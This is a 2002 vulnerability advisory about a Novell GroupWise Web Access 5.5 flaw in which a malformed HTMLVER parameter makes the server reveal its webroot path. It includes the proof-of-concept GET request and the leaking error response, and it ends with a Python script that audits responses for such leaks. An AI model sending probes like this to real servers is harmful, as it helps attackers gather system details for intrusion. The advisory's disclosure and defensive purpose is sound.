SecurityTracker.com
Category:  Application (Generic)  >  GroupWise
Vendors:  Novell
Novell GroupWise Server Discloses Web Installation Path to Remote Users
Date:  Feb 28 2002
Impact:  Disclosure of system information
Exploit Included:  Yes  
Advisory:  SecurityOffice.net
Version(s): 5.5
Description:  SecurityOffice.net reported an information disclosure vulnerability in Novell's GroupWise software. A remote user can determine the web installation path.

It is reported that a remote user can submit an HTTP GET request that supplies an unexpected value for a script variable. The server then returns an error message that displays the path to the webroot directory.

A demonstration exploit request is provided:

GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0

Impact:  A remote user can determine the web root directory on the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.novell.com/products/groupwise/
Cause:  Exception handling error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Date:  Wed, 27 Feb 2002 18:57:57 -0500
Subject:  Novell GroupWise Web Access Path Disclosure Vulnerability

 

Novell GroupWise Web Access Path Disclosure Vulnerability

Type

Input Validation Error

Release Date

February 28, 2002

Product / Vendor

Novell GroupWise, the premier communication and collaboration tool for
the one Net environment, helps you tackle some of the toughest business
challenges you face. Whether your organization is small, midsize or
large, your employees need e-mail, calendaring, document management and
other collaborative tools to open up the lines of communication and keep
your business running efficiently. 

http://www.novell.com/products/groupwise/

Summary

If an attacker submits a web request containing unexpected arguments for
script variables, an error message will be displayed containing the path
to the webroot directory of the server running the GroupWise Web Access.

Exploit

GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0

HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close

Could not find file SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM

Tested

Netware Enterprise Web Server 5.1 / GroupWise Web Access 5.5

Vulnerable

GroupWise Web Access 5.5 (and maybe others)

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on this
security advisory.

Author

Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
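
A response audit for this class of leak, as an added example that is not part of the advisory or of Novell's code: it scans an HTTP response body for volume- or drive-rooted file paths and reports which query parameters reappear as a path component, which is what the HTMLVER value does in the error shown above. The function name, the regular expression and the output structure are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Volume- or drive-rooted paths such as SYS:\DIR\FILE or C:\dir\file.
PATH_RE = re.compile(r"\b[A-Za-z][A-Za-z0-9_]*:\\(?:[^\\\s<>\"']+\\)*[^\\\s<>\"']+")

# Request line and error body as they appear in the advisory above.
PAGE_REQUEST = "GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0"
PAGE_BODY = r"Could not find file SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM"


def audit_response(request_line, body):
    """Return one finding per server path leaked in an HTTP response body.

    Each finding holds the leaked path and the names of query parameters
    whose value appears as a path component, i.e. request input that the
    server placed into a filesystem path without validating it.
    """
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else ""
    # keep_blank_values keeps bare keys such as GET-CONTEXT in the list.
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    findings = []
    for match in PATH_RE.finditer(body):
        path = match.group(0)
        components = {part.upper() for part in path.split("\\")}
        reflected = sorted(name for name, value in params
                           if value and value.upper() in components)
        findings.append({"path": path, "reflected_params": reflected})
    return findings


if __name__ == "__main__":
    for finding in audit_response(PAGE_REQUEST, PAGE_BODY):
        print("leaked path:", finding["path"])
        print("parameters reflected into it:", finding["reflected_params"])
```

A finding with a non-empty `reflected_params` list points at the parameter that needs an allowlist of accepted values, and any finding at all means the error page should be replaced with a generic message.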


 



Copyright 2002, SecurityGlobal.net LLC